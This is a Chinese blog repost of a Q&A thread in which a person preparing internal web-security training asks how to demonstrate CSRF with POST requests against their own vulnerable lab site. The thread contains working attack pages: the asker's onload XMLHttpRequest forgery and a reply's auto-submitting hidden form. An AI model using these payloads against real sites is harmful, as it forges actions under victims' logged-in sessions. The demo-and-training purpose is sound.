当前位置: 文江博客话题详情

如何演示 CSRF 攻击

发布于 2024-11-26 06:14:25 字数 3153 浏览 0 评论 0原文

我正在向我们企业中的其他一些人介绍网络安全,并且我想展示一些示例以产生更大的影响。

为此,我创建了一个容易受到此攻击的小型网站,该网站只能在我们的网络上访问。

我现在正在尝试利用此攻击,但我有一个问题:

如何使用 POST 表单执行此操作?

我使用 GET 查询执行此操作没有问题,但使用 POST 时,我尝试使用 javascript 执行此操作,如果我将代码托管在同一主机上,则没有问题,但如果我想将代码托管到另一个主机更现实地说,我被阻止是因为这是一个跨域请求。

那么我应该如何发送这些 POST 变量呢?

谢谢你!

这是我当前的代码:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CSRF attack demo</title>
<script type="text/javascript">
function getHTTPObject() {
        var http = false;
        //Use IE's ActiveX items to load the file.
        if(typeof ActiveXObject != 'undefined') {
            try {http = new ActiveXObject("Msxml2.XMLHTTP");}
            catch (e) {
                try {http = new ActiveXObject("Microsoft.XMLHTTP");}
                catch (E) {http = false;}
            }
        //If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document.
        } else if (window.XMLHttpRequest) {
            try {http = new XMLHttpRequest();}
            catch (e) {http = false;}
        }
        return http;
    }
function post_to_url(path, params, method) {
    method = method || "post"; // Set method to post by default, if not specified.

    // The rest of this code assumes you are not using a library.
    // It can be made less wordy if you use one.
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", path);

    for(var key in params) {
        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type", "hidden");
        hiddenField.setAttribute("name", key);
        hiddenField.setAttribute("value", params[key]);

        form.appendChild(hiddenField);
    }

    document.body.appendChild(form);
    form.submit();
}

function postToUrlBackground(path, params){
    var http = getHTTPObject();

    http.open("POST", path, true);

    //Send the proper header information along with the request
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", params.length);
    http.setRequestHeader("Connection", "close");

    http.onreadystatechange = function() {//Call a function when the state changes.
        if(http.readyState == 4 && http.status == 200) {
            //alert("Response received");
        }
    }
    http.send(params);
}
function TryAttack(){
    //alert("Sending");
    postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE");
    //postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE"    );
    //alert("sent");
}
</script>
</head>
<body onload="TryAttack()">
<img src=image.png />
</body>
</html>
原文

I'm doing an introduction to the web security to some other people in our enterprise, and I want to show some example to have more impact.

For this I've created a small website which is vulnerable to this attack, this website will be accessible only on our network.

I'm now trying to exploit this attack, but I've one question:

How to do this with a POST form?

I've no problem doing this with a GET query, but with a POST, I'm trying to do this with javascript, no problem if I host my code on the same host, but if I want to host my code to another host to be more realistic, I get blocked because it's a cross-domain request.

So how should I send these POST vars?

Thank you!

Here is my current code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CSRF attack demo</title>
<script type="text/javascript">
function getHTTPObject() {
        var http = false;
        //Use IE's ActiveX items to load the file.
        if(typeof ActiveXObject != 'undefined') {
            try {http = new ActiveXObject("Msxml2.XMLHTTP");}
            catch (e) {
                try {http = new ActiveXObject("Microsoft.XMLHTTP");}
                catch (E) {http = false;}
            }
        //If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document.
        } else if (window.XMLHttpRequest) {
            try {http = new XMLHttpRequest();}
            catch (e) {http = false;}
        }
        return http;
    }
function post_to_url(path, params, method) {
    method = method || "post"; // Set method to post by default, if not specified.

    // The rest of this code assumes you are not using a library.
    // It can be made less wordy if you use one.
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", path);

    for(var key in params) {
        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type", "hidden");
        hiddenField.setAttribute("name", key);
        hiddenField.setAttribute("value", params[key]);

        form.appendChild(hiddenField);
    }

    document.body.appendChild(form);
    form.submit();
}

function postToUrlBackground(path, params){
    var http = getHTTPObject();

    http.open("POST", path, true);

    //Send the proper header information along with the request
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", params.length);
    http.setRequestHeader("Connection", "close");

    http.onreadystatechange = function() {//Call a function when the state changes.
        if(http.readyState == 4 && http.status == 200) {
            //alert("Response received");
        }
    }
    http.send(params);
}
function TryAttack(){
    //alert("Sending");
    postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE");
    //postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE"    );
    //alert("sent");
}
</script>
</head>
<body onload="TryAttack()">
<img src=image.png />
</body>
</html>

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

苄①跕圉湢 2024-12-03 06:14:25

在“其他主机”(攻击者)上,您只需使用 POST 方法创建一个 FORM,其 action (即提交表单的位置)是您的易受攻击的应用程序。然后您在该页面上使用 javascript 提交它。

像这样:

<html><body>
  <form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST">
    <input type="hidden" name="csrf_param" value="POST_ATTACK">
  </form>

  <script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

当您打开该页面时,这将从攻击者的主机向您的易受攻击的应用程序提交一个 POST

On the "other host" (the attacker) you just create a FORM with method POST whose action (i.e. where the form is submitted) is your vulnerable app. Then you submit it with javascript on that page.

Like this:

<html><body>
  <form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST">
    <input type="hidden" name="csrf_param" value="POST_ATTACK">
  </form>

  <script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

This will submit a POST to your vulnerable app from the attacker's host, when you open that page.

回复 原文
~没有更多了~

关于作者

情愿

暂无简介

0 文章
0 评论
24 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

已经忘了多久

文章 0 评论 0

15867725375

文章 0 评论 0

LonelySnow

文章 0 评论 0

走过海棠暮

文章 0 评论 0

轻许诺言

文章 0 评论 0

信馬由缰

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文